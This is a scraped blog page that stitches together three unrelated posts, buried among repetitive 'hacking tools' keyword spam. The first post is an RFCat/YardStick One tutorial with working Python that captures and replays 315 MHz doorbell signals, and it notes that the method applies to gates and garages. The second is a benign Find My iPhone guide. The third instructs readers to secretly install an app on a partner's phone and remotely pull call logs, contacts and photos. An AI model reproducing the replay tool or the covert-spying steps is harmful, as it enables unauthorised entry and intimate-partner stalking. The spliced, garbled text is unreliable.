PENGUMUMAN...!!!


SOLAT HAJAT DI TUNDA KE 24HB OGOS 2008 - UST SALLEH MAN

Saturday, August 22, 2020

Hacking Everything With RF And Software Defined Radio - Part 2

YardStick One Unleashed, Automating RF Attacks In Python - An RFCat Primer 


I decided to dive into our current device a bit more before moving on to a new device, and really ramp up the skillsets with RFCat and the Yardstick.  So for this blog you will need our previous Target and a Yardstick One. We will be hacking everyting using only the Yardstick and Python.
If your really bored and want to follow me:
Twitter: @Ficti0n
Site: cclabs.io or consolecowboys.com


Purchase Devices needed to follow this blog series: 

Target 1:(from the last blog)

YardStick One: (from the last blog)


So last time we scanned for signals with GQRX and a Software Defined Radio device. We took the demodulated wave forms in Audacity and discerned what the binary representation of our wave forms were by decoding them manually. We then transferred those into a hex format that our yardstick understood.  However there is a way to do everything with our Yardstick. It will require a bit more understanding of the RFCat library, and a bit of python. 
This blog will be your RFCAT primer and coding tutorial, but don't be scared with the word "Programming" I will be using simple code, nothing complicated. So if your a programmer, tune out any coding explanation and understand RFCat, if your not a coder, then use this as a jumping point to start making some quick python scripts for hacking. 


Video Series PlayList Associated with this blog:






The first thing we did in our last blog after looking up the frequency was to open up GQRX and check if we can see our devices signals. As it turns out you can actually do this in python with RFCat. Which is really convenient if you left your Software Defined Radio dongle at home but happen to have access to a Yardstick. 

RFCat as a Spectrum Analyzer: 

In order to use RFCat as a spectrum analyzer we need to make sure we have RFcat installed and a few prerequisites such as python and PySide modules.  I actually did this inside of an Ubuntu VMware because Pyside was giving me issues on OSX and I didn't feel like trying to fix it. So If you spin up an ubuntu vm you can do the following to get things up and running.. 

Install Spectrum Analyzer PreReqs:
sudo pip install PySide
sudo apt-get install ipython

Plug in your adapter and type in the following: 
rfcat -r 
d.specan(315000000)

You will then see the below output of RFCat Specan running in the 315 MHz range. 
Click our doorbell, or trip the motion sensor and you will see a frequency spike as shown in the second picture. 
This is similar to what you saw in GQRX but all with your Yardstick and the Python RFCat library.  





So everything seems to be working and we can see our devices transmitting on the 315MHz frequency.  Unfortunately we have no record button on Spescan. This leaves us to dive a little deeper into RFCat. We will see what RFCat can do for us in the recording and sniffing capacity. 


Sniffing RF Data With The YardStick and Python: 

In RFCat there is a simple listening command in our interactive session which will give us an idea of what is being transmitted and in what type of data format we are recieving. When using GQRX we received a WAV file, but what does RFCat give us?  One thing I have realized over the years is programming is all about dealing with data in various formats and figuring out how to parse and use it in various implementations. So the first thing we have to figure out is what kind of data we are dealing with. 

Lets hop back into RFCat and set a few parameters so the yardstick knows to listen on 315MHz and to use ASK modulation.  The settings below should all be familiar from our last blog with an exception of "lowball" which configures the radio to use the lowest level of filtering. We basically want to see everything but may experience some noise by not filtering it out.. For example before you hit your doorbell button you may see random FF FF FF FF data outputted to the screen.

Below is the cmdline input needed and some example output. After all of our settings are in place we can use RF.listen() to start listening for everything in the 315000000 frequency range and have it output to the screen.  

After you set it up, you can press the button on your doorbell and you will receive the following output. We have lots of zeros and what might be some hex output. 

Destroy ficti0n$ rfcat -r


>>> d.setFreq(315000000)
>>> d.setMdmModulation(MOD_ASK_OOK)
>>> d.setMdmDRate(4800)
>>> d.setMaxPower()
>>> d.lowball()
>>> d.RFlisten()
Entering RFlisten mode...  packets arriving will be displayed on the screen
(press Enter to stop)

(1508637518.258) Received:  c000842139ce0000000000000021bdc218c631bdef00000000000000309ce10842109ce700000000000000109ce10842109ce70000000000000010def18c6318def780000000000000084e708421084e7380000000000000084e708421084e7380000000000000084e708421084e7380000000000000084e708421084e7380000000000000084e708421084e7380000000000000084e708421084e7380000000000000084e708421084e7380000000000000084e708421084e7380000000000000084e708421084e7380000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  | ...!9........!....1.........0...B..............B..............c...........Np.!.Ns........Np.!.Ns........Np.!.Ns........Np.!.Ns........Np.!.Ns........Np.!.Ns........Np.!.Ns........Np.!.Ns........Np.!.Ns.................................................


If you hit "ENTER" in your terminal you will stop receiving packets and drop back into a python interactive terminal. If we take a look at the repeating pattern in the above output, it looks like some random patterns and then a repeating pattern of, 84e708421084e738.  If we convert that to binary we can compare with what we decoded WAV from our previous blog. 

Since we are already in a python terminal you can type the following to see the binary representation:

>>> bin(int("84e708421084e738",16))[2:]
'1000010011100111000010000100001000010000100001001110011100111000'

 Lets break that up into 8 bit bytes and compare it to our previous blogs binary, hmm its lot different then what we originally decoded the signal to be: 
New: 10000100 11100111  00001000 01000010  00010000  10000100   11100111    00111000
Orig:  10111000 10001011 10111000 10001000  10001011   10111011   10000000

If we take the above capture data and format it correctly for RFcat with the replay code from the last blog.  When we send it over, it does indeed ring the doorbell, thats interesting. A completely different value in both hex and in binary and still we get a doorbell to ring. So the variance we talked about last time extends a bit more.  Below is the code with the new hex from the capture data:

from rflib import * 

d = RfCat()
d.setFreq(315000000)
d.setMdmModulation(MOD_ASK_OOK)
d.setMdmDRate(4800)

print "Starting"
d.RFxmit("\x84\xe7\x08\x42\x10\x84\xe7\x38\x00\x00\x00\x00\x00\x00"*10)
print 'Transmission Complete'


TroubleShooting Antenna Issues: 

I will also take a minute to note something before we continue. I had a little trouble at first when using a telescopic antenna in RFcat and the YardStick.  So I will list those issues below as notes for you to play with if you run into random looking captures when pressing your doorbell button. 
  • When using a telescopic antenna closed I had almost repeating output with some random bits flipped
  • When extending the antenna it went crazy output with random noise
  • I then used a small rubber ducky antenna and got the repeating output shown above. 

What we have done so far: 

So above, we managed to figure out the following all in RFCat 
  • Verify the frequency with RFCat
  • How can I listen for it and capture a transmission with RFCat
  • How can I send this transmission with RFCat


We have basically eliminated the immediate need for the graphical tools that we were using in the last blog. Not to say that they are not useful. They absolutely are, and we should use them often and know how to work with all kinds of formats and understand everything.. However, if we are living in a reality that all we have is a Yardstick and no other tools. We are not helpless and we can still kick some serious RF butt. 

Now we are going to take this a bit further so we can learn some more about RFCat, Python and mistakes  I made when trying to automate this stuff. I found some interesting quirks I had to work through and I would like to save others some time who are also in the learning process as I am. 

Using RFrecv() for Listening: 

Ok first thing I learned is that RFListen() is not all that useful when it comes to automating this stuff. I tried to set its output to a variable but that did not seem to work.. So instead we will be working with another feature that lets us listen and that is RFrecv().  If we fire up our RFCat in the terminal again we can give that a try: 

Destroy:~ ficti0n$ rfcat -r
>>> d.setFreq(315000000)
>>> d.setMdmModulation(MOD_ASK_OOK)
>>> d.setMdmDRate(4800)
>>> d.setMaxPower()
>>> d.lowball()
>>> d.RFrecv()
Traceback (most recent call last):
  File "", line 1, in
  File "/Library/Python/2.7/site-packages/rflib/chipcon_nic.py", line 1376, in RFrecv
    data = self.recv(APP_NIC, NIC_RECV, timeout)
  File "/Library/Python/2.7/site-packages/rflib/chipcon_usb.py", line 664, in recv
    raise(ChipconUsbTimeoutException())
ChipconUsbTimeoutException: Timeout waiting for USB response.


OK thats not cool we are getting a weird error if we don't get a signal right away regarding ChipconUsbTimeoutException.  

No problem since we are in a python terminal we can just capture this exception and pass it, then continue with sniffing.  This is done with a Try/Except block. 

try:
...     d.RFrecv()
... except ChipconUsbTimeoutException:
...     pass
...


That looks a little better, I am no longer receiving errors, but lets put this in a loop so we are continuously listening with RFrecv() and press our doorbell so we can capture our doorbell signal.  Below is the output of a random signal that came in followed by our doorbell.. but its all kinds of crazy looking and a bit hard to read: 

try:
...     d.RFrecv()
... except ChipconUsbTimeoutException:
...     pass
...
while True:
...     try:
...             d.RFrecv()
...     except ChipconUsbTimeoutException:
...             pass



Lets try to fix the output a little and make it more readable by encoding it before we view it. Open up your text editor and use the following code.  What we are doing here is simply setting up our listener as we did before and then setting it to a variable we can use. 

Line 12: Setting our RFrecv() output to the variable y and z. The y variable is the output that we want 
Line 13: We will wrap the y variable with an encode function to encode it with a HEX encoding. 
Line 14: After that we just print it out. 




When we run this script from the command line we will get a much nicer output shown below, much like we did with the RFlisten function above. The big difference being that our data is now set to the variable "capture"  on line 13 and we can do what we want with that data. For example we can directly replay that data rather then manually performing the actions.  




Parsing and replaying data: 

This actually took me a bit of time to figure out, so we need to do a few things to get this to work: 
  • We need to parse out the data from the surrounding 0s
  • We need to convert it to a format we can send (tricker then it sounds) 
  • We need to add padding and send that data over (We know how to do this already) 


Parsing Data: 

So with this I first tried all kinds of regular expressions, but for some reason the inverse of more then 3 zeros in a row does not seem to work. I am no regex master but that seemed like it should be working. I then tried a few creative solutions reducing repeating zeros down to pairs that I could split on with string functions. This actually worked well but then my buddy showed me this which was more efficient: 

re.split ('0000*', capture)

All this is doing is using the regex library to parse on a set of 4 or more zeros  and return whats left in a list of useable hex data for sending.  So lets add that into our code and give it a try to see what we get back.  I made the following code changes: 

Line 2: Import the Regex library
Line 11: We defined the capture variable so we can access it outside of the Try Block and the loop
Line 21: We created a payloads variable and created a list from the capture file of non 0000 blocks
Line 22: We print out our list of useable payloads which can been seen in the below output




Data Format Woes:

So we have data in a list we can pull from, thats awesome but I ran into a few issues. I first tried to parse this data into the \x format we normally used when sending our attack payloads manually, but that actually does not work. Reason being that if I use a code snippet like the following to convert this data into the right format everything looks ok and something like this \x84\xe7\x08\x42\x10\x84\xe7. But it won't actually work when I send it with RFCat. For some reason when you paste in your own hex its in a different format then if you programmatically create hex like below.  You don't really need to understand the code below, just know it takes our payload and creates the hex in a visual format to what we used in the last blog: 

DON'T USE THIS.. IT WONT WORK!!! 
for payload in payloads: 
    formatted = ""
    if (len(payload) > 6) and (len(payload) % 2 == 0):
    
        print "Currently being formatted: " + payload 
        iterator = iter(payload)
        for i in iterator:
            formatted += ('\\x'+i + next(iterator))
    else:
        continue

Formatted Hex Vs Manually Pasted Hex
So lets compare the outputs of our manually created Hex String versus what we get when we format with the above code 
Below is the output of the following:
  • Your encoded capture
  • Your parsed payloads in a nice list
  • Your payload being processed into hex. 
But this is where things go wrong, you then have :
  • Your nicely formatted Hex created by your code above (Yay for us) 
  • Then you have your manually pasted in hex from your original attack payloads as unprintable characters  (What?)




 You can clearly see there is a major difference between when we manually paste in our hex like we did in the last blog and when we create it from our capture file.  This led to another sleepless night of researching whats going on. I did a bunch of troubleshooting until I found some code on the RFcat site and saw it using the BitString library and something called BitArray.  The examples for this library were using binary data instead of hex and then converting it. 


BitString BitArray Formating FTW: 

If you remember above we created binary input with some python, so lets use that code in our current program template and then feed it into byteArray and see what happens. We can install bitstring with the following: 

Install Bitstring:
sudo pip install bitstring

Our New code using BitString: 
Line 2:   I imported bitstring
Line 25: I added a for loop to go through our payload list one by one
Line 27: I convert our current payload to binary
Line 28: I take that binary and I feed it into bitstring to fix the formatting issues
Lines 29-30:  Print out our binary and our new data that match our manually pasted data format, shown below




With these conversions the data above looks like its correct to attack our target devices. I know this seems like a lot of steps, but honestly this is only 50 lines of code in all to automate our replay attacks in a simple way.  It is also very easy if you know what your doing and don't spend all of your time figuring it out like I did.  You just need to understand how to work with the types of data each component understands. 

With this latest code update we are ready to send our code with a simple modification to our RFxmit line from the last blog. We will now change RXxmit to take our formatted variable and then append our padding: 

d.RFxmit((formated+"\x00\x00\x00\x00\x00\x00")*10)


Below is our full code to automate this attack, with a few changeups, but not many.. Really all I did was add some conditional statements to limit our data to longer payloads that are divisible by 2 since our hex takes 2 string characters for example \x41 is the string character 4 and 1.  I originally did this for the iterator code which required the proper amount of characters but decided to leave it since it makes sense anyway.  I also set it so that if there is a capture it breaks out of the loop. This way we are not continuously attacking every transmission we see. Instead for our testing we can hit our doorbell, replay all the values before our script finishes and exits. 


Note: I sent similar code to a friend and had him run it against a black box real world target. He had permission to attack this target via the owner of a facility and it worked flawlessly.  So although a doorbell is a trivial target. This same research applies to garages, gates, and any other signal not using protection mechanism such as rolling code, multiple frequencies at once etc.

Also note that when you run this, almost all of the payloads in your list will ring the doorbell which is why I put a timing variable before the sending command. This way your doorbell isn't overburdened. I already broke a few of these devices during testing LOL. 
I have since modified this code to be more effective, and have additional features and more niceties, I will release that code when its ready.. For now enjoy the below code and hit me up with any questions or comments.


#—————YardStick_InstantReplay_SimpleVersion.py ----------#
# @Ficti0n
# http://consolecowboys.com 


from rflib import *
import time
import re
import bitstring

print("Listening for them signals in ASK")
d = RfCat()
d.setFreq(315000000)
d.setMdmModulation(MOD_ASK_OOK)
d.setMdmDRate(4800)
d.setMaxPower()
d.lowball()

#-----------Start Capture 1 Transmission ----------#
capture = ""
while (1):
    try:
        y, z = d.RFrecv()
        capture = y.encode('hex')
        print capture
        
    except ChipconUsbTimeoutException: 
        pass
    if capture:
        break

#Parse Hex from the capture by reducing 0's
payloads = re.split ('0000*', capture)
print payloads

#----------Start Parse and Create Payload---------#
for payload in payloads: 
    
    formated = ""
    if (len(payload) > 6) and (len(payload) % 2 == 0):
        print "Currently being formatted to binary: " + payload 
        binary = bin(int(payload,16))[2:]
        print binary
        print "Converting binary to bytes: "
        formatted = bitstring.BitArray(bin=(binary)).tobytes()
    else:
        continue

#------------Send Transmission--------------------#
    time.sleep(2)
    print "Sending bytes with padding"
    d.RFxmit((formatted+"\x00\x00\x00\x00\x00\x00")*10)
    print 'Transmission Complete'


Thats All Folks, Whats Next: 


I hope this blog is helpful in demystifying RFCat in order to successfully perform/automate attacks with only Python and your Yardstick One. This is essentially a few nights of my research posted here for everyone to learn from. Because it was a pain to find useful information, and I would like to save other people a lot of sleepless nights. I am by no means the master of RF or RFCat, there is tons more to learn.  Up next I will get back on track with a real world attack against a device and creating our own keyfobs to replay our attacks in the future. 
Continue reading
  1. New Hacker Tools
  2. Hacker Tools Software
  3. Hacker Hardware Tools
  4. Hak5 Tools
  5. Hackers Toolbox
  6. Hacking Tools Online
  7. Hacker Techniques Tools And Incident Handling
  8. Hack And Tools
  9. Hacker Tools Linux
  10. Beginner Hacker Tools
  11. Pentest Tools Kali Linux
  12. Free Pentest Tools For Windows
  13. Computer Hacker
  14. Hacking Tools Software
  15. Hacking Tools And Software
  16. Hack Rom Tools
  17. Hacker Tools Mac
  18. Hack Tools
  19. Pentest Tools Tcp Port Scanner
  20. Hacker Tools Github
  21. Best Pentesting Tools 2018
  22. How To Install Pentest Tools In Ubuntu
  23. Hacking Tools Download
  24. Hacker Tools For Windows
  25. Hack Tools Online
  26. Hacker Tools Software
  27. Hacker Tools Apk
  28. Hacker Tool Kit
  29. Pentest Tools Website Vulnerability
  30. Hacking Tools Download
  31. Hacking Tools Online
  32. Hacker Tools Free Download
  33. Pentest Tools Alternative
  34. Hack Tools
  35. Hacking Tools Windows
  36. Pentest Tools Find Subdomains
  37. Computer Hacker
  38. Bluetooth Hacking Tools Kali
  39. Hacking Tools And Software
  40. New Hacker Tools
  41. Bluetooth Hacking Tools Kali
  42. Hacking Tools 2020
  43. Bluetooth Hacking Tools Kali
  44. Hacker Tools List
  45. Hacking Tools For Beginners
  46. Bluetooth Hacking Tools Kali
  47. Hacker Tools For Pc
  48. Hacking Tools Windows
  49. Pentest Tools Website Vulnerability
  50. Hack Tools
  51. Hack Tools Github
  52. Kik Hack Tools
  53. Pentest Tools For Ubuntu
  54. Hacking Tools Usb
  55. Hack Tools Mac
  56. Wifi Hacker Tools For Windows
  57. Hack Apps
  58. Pentest Tools Website Vulnerability
  59. Hacking Tools For Windows 7
  60. How To Hack
  61. Pentest Tools Android

How To Track Iphone Without Them Knowing

Few feelings are as stomach-sinkingly awful as the thought of losing an expensive new iPhone. Whether you left it on the bus or someone slid it out of your back pocket, we put so much store in our phones that their loss leaves is saddened and angered. Most of us keep at least copies of everything in our lives on our phones, from personal conversations to emails, 


To say nothing of all our personal information and social media accounts. Of course there are security measures in place, but nobody wants to risk having all that information fall into the hands of the wrong people. In this article, I will show you how to find a phone that has been lost, whether your own phone or the phone of a friend or family member.

Can you track an iPhone without them knowing?

First off, hopefully you activated the Find My Phone feature of your iPhone when you still had it in your possession. Secondly, if your phone doesn't have service (and thus a connection to the Internet) or if you don't have iCloud set up, then these solutions are not going to work for you. Unfortunately phone technology is advanced but it isn't magical; if your phone isn't talking to the network or if you haven't turned on Find My Phone, then unfortunately the technological solution is probably not going to work. (Seriously. If you have possession of your phone(s) then stop reading this article, pick up your devices, go to Settings and select "Find My Phone" (iPhone) or "Find My Device" (Android) and make sure they are toggled on. TTjem upi cam dp ot/"

Without further ado, let's find your phone!

Can I Tell if Someone is Tracking my iPhone?

 

image1-3

Usually yes, if someone is using the "Find my Phone" feature, it will be displaying things on the iPhone screen. Thankfully, "Find My iPhone" comes pre-loaded on all phones with iOs 9 or newer. "Find my iPhone" is the gold standard when it comes to locating your lost iPhone. The service is integrated as part of iCloud. Here's how to use it to find your missing iPhone then track down your phone's exact location.

Step 1: Open up the "Find My iPhone" on a different device

It doesn't matter if you decide to use your iPad, your laptop, or a friend's iPhone – you can run the Find My Phone app fr0m Mac. You can use the Find my Phone app.

If you are using an Apple product like another phone or an iPad, you can simply click on the app.

If you are using a computer (even a Windows PC will work), go to icloud.com then click on the "Find iPhone" icon. Once you've clicked on the "Find iPhone" icon the website process and "Find my iPhone" app process are the same.

Step 2: Input Your Apple ID Credentials (they are the same as your iCloud info)

Since you are not using your phone, you won't be automatically logged in.

Once you log in to the app, select the "All Devices" drop-down option and then find the device that you want to locate.

Step 3: Once You Select Your Phone, Options Will Appear

As soon as you select your device on the page, iCloud will begin to search for it. If the search is successful, you will see your device on a map, pinpointing it's location. Before you sprint out the door to get it, there are some other options you should take a look at.

Once you select your device you will have three additional options in addition to seeing your phone's location. These options are playing a sound, activating "Lost Mode" and erase the phone.

Playing the sound is a great way to find your phone if you lost it somewhere around your house. If you click the option, an audio alert will go off on your phone which will hopefully help you find it. The alert will sound like a loud pinging noise alerting you that your phone is at home with you and not at the coffee shop you just visited. If you hear the pinging sound then you'll quickly find your phone by just following the sound.

When enabled, Lost Mode will lock your phone with a passcode and will display a message of your choice. This can either ensure it will be safe until you can find it, or will alert the thief what you expect of them and that you know where they are. This mode can also enable location services on your phone too.

However, if things have gone too far and you think there is a very slim chance you will ever get your device back – perhaps your phone has already crossed an international border – the best course of action is to simply erase it. Yes, this is giving up, but it also prevents your personal information getting into the hands of someone who could abuse it.

If you follow these steps, you should have your phone back in your pocket in no time. 

Is there an app to track someones phone without them knowing?

maxresdefault-11

What if you're looking for someone else's phone? I'm sorry to burst your bubble, but you are not allowed to track someone else's phone without their knowledge. While there are supposedly apps that you can install on a target's phone to track it and keep tabs on what they are doing on it, that is completely illegal and immoral. In addition to the moral issue, there is the practical fact that they could find the app which could lead to a very awkward situation, possibly one involving the police.

However, there are times when you want to find a friend's phone and you have a legitimate reason, and (the important part) they have given you permission to find it. Just as when you were looking for your own phone, there is an app that can help you find the phones of your friends and family with ease. The "Find My Friends" app used to be an extra download, but now it comes with iOS, so if your friends have ever updated their phone, they should have it.

"Find My Friends" is an app that basically allows you to share your location with others and vice versa. It can be great for keeping track of where your kids are, knowing what your significant other is doing, or just keeping tabs on your friends. It can also help them find a lost phone (as long as you have "Shared Locations" with them). Here is how to set it up:

Step 1: Open the app on your phone and the phone of the person you want to be able to share locations with.

Step 2: Click your profile in the bottom left of the screen.

Step 3: Enable "Share My Location" and make sure AirDrop is enabled on your own phone.

Step 4: From there, your friends and family will be able to search/add you to share your location with them and vice versa. You each will need to accept the "Shared Location" request from the other. Now, you can just click on their profile in the app and keep track of them.

As you likely realized while reading this article, it is a much better idea to be proactive than reactive when it comes to tracking phones. If you set up "Find My iPhone" and "Find My Friends" before your phone gets stolen or lost, it will save you a lot of potential hassle down the road. While it may be a bit worrisome to have someone be able to see your location at all times, it can really save you once your phone goes missing and you need to track it down. It is obviously best to pick someone who you trust not to take advantage of the information an app like "Find My Friends" can provide them.

No one deserves to have their phone stolen or go missing, but thankfully, there are some ways to find it, or at least have the information deleted. Hopefully, this guide helped you be able to find your phone or the phone of your friends and family, or at least prepared you for when it may happen.

If you have other ways of finding a lost phone, please share them with us below!

@EVERYTHING NT

Related word

  1. Hacker Tools Windows
  2. Best Pentesting Tools 2018
  3. Pentest Automation Tools
  4. Pentest Tools Subdomain
  5. Hacking Tools For Games
  6. Hacker Tools 2020
  7. Pentest Tools Windows
  8. Hacker Tools Apk
  9. Hacker Tools For Ios
  10. Hack Tools Github
  11. Install Pentest Tools Ubuntu
  12. Easy Hack Tools
  13. Hack Apps
  14. Best Pentesting Tools 2018
  15. Hacking Tools Pc
  16. Pentest Tools Github
  17. Hacking Tools For Windows 7
  18. Pentest Tools Website Vulnerability
  19. Hacker Tools Free
  20. Pentest Tools Github
  21. Hack Tool Apk
  22. Hacking Tools For Games
  23. Termux Hacking Tools 2019
  24. Hack Apps
  25. Game Hacking
  26. Hack Tool Apk No Root
  27. Hacking Tools For Mac
  28. Physical Pentest Tools
  29. Pentest Tools List
  30. Hack Tools 2019
  31. Hacking Tools For Windows Free Download
  32. Hacks And Tools
  33. Hak5 Tools
  34. Hacker Tools 2020
  35. Pentest Tools Open Source
  36. Hacking Tools And Software
  37. Hacking Tools For Windows Free Download
  38. Pentest Tools Download
  39. New Hack Tools
  40. Hacking Tools Windows 10
  41. Pentest Tools Online
  42. Hacker Tools Free
  43. Tools Used For Hacking
  44. Hacker Tools Online
  45. Hackers Toolbox
  46. Pentest Box Tools Download
  47. Hack Rom Tools
  48. Hackers Toolbox
  49. Termux Hacking Tools 2019
  50. Pentest Tools Linux
  51. Hacker Tools Free Download
  52. Hacking Tools For Mac
  53. Hacker Tools For Windows
  54. Hack Tools Mac
  55. Hacker Tools Hardware
  56. Nsa Hack Tools Download
  57. Hacker Tools Online
  58. Computer Hacker
  59. Hacking Tools 2020
  60. Hacker Tools 2020
  61. Pentest Tools For Ubuntu
  62. How To Install Pentest Tools In Ubuntu
  63. Hak5 Tools
  64. Hack Tools Github
  65. Hacker Tools Free Download
  66. Hacker Tool Kit
  67. Hacking Tools Kit
  68. Pentest Tools Url Fuzzer
  69. Pentest Tools Website
  70. Top Pentest Tools
  71. Pentest Recon Tools
  72. Wifi Hacker Tools For Windows
  73. Hacking Tools For Windows
  74. Pentest Tools Find Subdomains
  75. What Is Hacking Tools
  76. Hack Tools For Ubuntu
  77. Wifi Hacker Tools For Windows
  78. Beginner Hacker Tools
  79. Growth Hacker Tools
  80. Hack Tools For Games
  81. Hack Website Online Tool
  82. Hacker Tools For Mac
  83. Hack Rom Tools
  84. Github Hacking Tools
  85. Hacking App
  86. Hacker Tools Mac
  87. Hack Tools For Mac
  88. Tools Used For Hacking
  89. Pentest Tools Port Scanner
  90. Pentest Tools List
  91. Hack Rom Tools
  92. Pentest Tools Find Subdomains
  93. What Is Hacking Tools
  94. Hacking Tools For Mac
  95. Usb Pentest Tools

How To Hack And Trace Any Mobile Phone With A Free Software Remotly

Hello Everyone, Today I am Going To Write a very interesting post for You ..hope you all find this valuable.. :
What is The cost to hire a spy who can able to spy your girlfriend 24X7 days..???? it's around hundreds of dollars Or Sometimes Even Thousands of dollars 🙁
But you are on Hacking-News & Tutorials so everything mentioned here is absolutely free.
would you be happy if I will show you a Secret Mobile Phone trick by which you can Spy and trace your girlfriend, spouse or anyone's mobile phone 24 X 7 which is absolutely free?The only thing you have to do is send an SMS like SENDCALLLOG To get the call history of your girlfriend's phone.isn't it Sounds Cool... 🙂
Without Taking Much Of Your Time…
let's Start The trick…
STEP 1: First of all go to android market from your Girlfriend, spouse, friends or anyone's phone which you want to spy or download the app mentioned below.
STEP 2: Search for an android application named "Touch My life "

STEP 3: download and install that application on that phone.
STEP 4: Trick is Over 🙂
Now you can able to spy that phone anytime by just sending SMS to that phone.
Now give back that phone to your girlfriend.
and whenever you want to spy your girlfriend just send SMS from your phone to your Girlfriend phone Which are mentioned in Touch My Life manage to book.
I am mentioning some handy rules below…
1) Write "CALL ME BACK" without Quotes and Send it to your girlfriend's mobile number for an Automatic call back from your girlfriend's phone to your phone.
2)Write "VIBRATENSEC 30" without Quotes and send it to your girlfriend's mobile number to Vibrate your Girlfriend's Phone for 30 seconds.You can also change Values from 30 to anything for the desired Vibrate time.
3)Write "DEFRINGTONE" without Quotes and Send it to your girlfriend's mobile number..this will play the default ringtone on your girlfriend's phone.
4)Write "SEND PHOTO youremail@gmail.com" without Quotes and Send it to your girlfriend's mobile number.it will take the photo of the current location of your girlfriend and send it to the email address specified in the SMS as an attachment.it will also send a confirmation message to your number.
5)Write "SENDCALLLOG youremail@gmail.com" without Quotes and Send it to your girlfriend's mobile number ..it will send all the call details like incoming calls, outgoing calls, missed calls to the email address specified in the SMS.
6)Write "SENDCONTACTLIST youremail@gmail.com" without Quotes and Send it to your girlfriend's mobile number ..it will send all the Contact list to the email address specified in the SMS.
So Guys Above all are only some Handy features of touch my life…You can also view more by going to touch my life application and then its manage rules... 🙂
Enjoy..:)
Stay tuned with IemHacker … 🙂

Related word
  1. Hacker Tools List
  2. Hacking Tools For Beginners
  3. Hacking Tools Windows 10
  4. Install Pentest Tools Ubuntu
  5. Hack Tools 2019
  6. Pentest Tools For Android
  7. Best Pentesting Tools 2018
  8. Best Hacking Tools 2019
  9. Hacking Tools 2019
  10. Nsa Hack Tools Download
  11. Hack Tools Github
  12. Beginner Hacker Tools
  13. Pentest Tools
  14. Hacker Tools Windows
  15. Hackers Toolbox
  16. Game Hacking
  17. Pentest Tools Windows
  18. Hacker Tools List
  19. Pentest Tools Find Subdomains
  20. Nsa Hacker Tools
  21. Hack Tools For Pc
  22. Tools Used For Hacking
  23. Wifi Hacker Tools For Windows
  24. Pentest Tools Free
  25. Underground Hacker Sites
  26. Pentest Tools Url Fuzzer
  27. Hacking Tools Windows 10
  28. Hacking Tools Windows 10
  29. Pentest Tools Tcp Port Scanner
  30. Hacker Tools Windows
  31. Hacking Tools Online
  32. Pentest Box Tools Download
  33. Pentest Tools Apk
  34. Pentest Reporting Tools
  35. Hack Tools Pc
  36. Hacker
  37. Pentest Tools Apk
  38. Hacking Tools Software
  39. Hacker Tools Software
  40. Wifi Hacker Tools For Windows
  41. Pentest Reporting Tools
  42. Hacking Tools For Games
  43. Hacker Tools For Ios
  44. Hacker Tools For Ios
  45. Pentest Tools Bluekeep
  46. Hack Tools Pc
  47. Bluetooth Hacking Tools Kali
  48. Hack Tools For Games
  49. Hack App
  50. Github Hacking Tools
  51. Hacking Tools Free Download
  52. Hacking Tools And Software
  53. Hacker Tools Linux
  54. Nsa Hacker Tools
  55. Pentest Tools Online
  56. New Hacker Tools
  57. Hacker Tools Apk
  58. Hack Tools Mac
  59. Hacker Tools
  60. Nsa Hack Tools
  61. Kik Hack Tools
  62. Pentest Tools Android
  63. Pentest Tools Android
  64. Hacks And Tools
  65. Hack Tools 2019
  66. Hack Tools Download
  67. Hacking Tools Windows 10
  68. Hacking Tools Download
  69. Pentest Tools Kali Linux
  70. Hacking Tools For Games
  71. Pentest Tools For Mac
  72. Hack Tools For Pc
  73. Hacking Tools 2019
  74. Hacker
  75. Best Hacking Tools 2020
  76. Hacker Tools Mac
  77. Pentest Tools For Mac
  78. Best Pentesting Tools 2018
  79. Hacker Tools For Mac
  80. Hacker Tools
  81. Pentest Tools Open Source
  82. Hacker Tools Apk Download
  83. Pentest Tools Framework
  84. New Hacker Tools
  85. Hacker Tools Github
  86. Hacker Techniques Tools And Incident Handling
  87. Top Pentest Tools
  88. Hacking Tools Hardware
  89. Hacker Tools Apk Download
  90. Hacking Tools For Windows
  91. Hacker Tools Free
  92. Hacking Tools Hardware
  93. Hacking Tools Online
  94. Pentest Tools Website Vulnerability
  95. Hacker Tools Online
  96. Hacks And Tools
  97. How To Install Pentest Tools In Ubuntu
  98. Hacking Tools Hardware
  99. Growth Hacker Tools
  100. Nsa Hacker Tools
  101. Hacker Tool Kit
  102. Pentest Tools Kali Linux
  103. World No 1 Hacker Software
  104. Nsa Hack Tools Download
  105. Hacker Tools For Mac
  106. Hacker Tools Free
  107. Pentest Tools Url Fuzzer
  108. Pentest Tools Linux
  109. Pentest Recon Tools
  110. Termux Hacking Tools 2019
  111. Github Hacking Tools
  112. Hacking Tools Online
  113. Hack Tools Download
  114. Hack Tools Mac
  115. Hacker Tools For Mac
  116. Wifi Hacker Tools For Windows
  117. Pentest Tools Linux
  118. Nsa Hack Tools
  119. Hacking Apps
  120. Hacker Tools For Ios
  121. Pentest Tools Free
  122. Pentest Tools Github
  123. Hack Tools For Pc
  124. Kik Hack Tools
  125. Hacker Tools Hardware
  126. Hacker Security Tools
  127. Hacking Tools For Kali Linux
  128. Pentest Tools List
  129. Pentest Tools Framework
  130. Pentest Tools For Ubuntu
  131. What Are Hacking Tools
  132. Free Pentest Tools For Windows
  133. Nsa Hack Tools
  134. Hacking Tools For Mac
  135. Hack Tools For Pc
  136. Game Hacking
  137. Pentest Recon Tools
  138. Hacker Tools For Pc
  139. Pentest Tools Tcp Port Scanner
  140. Pentest Tools Website
  141. Hacker
  142. Hacking App
  143. Pentest Tools Free
  144. Pentest Tools Github
  145. How To Make Hacking Tools
  146. Underground Hacker Sites
  147. Hacker Techniques Tools And Incident Handling
  148. Hack And Tools
  149. Pentest Recon Tools
  150. Hack Tools Pc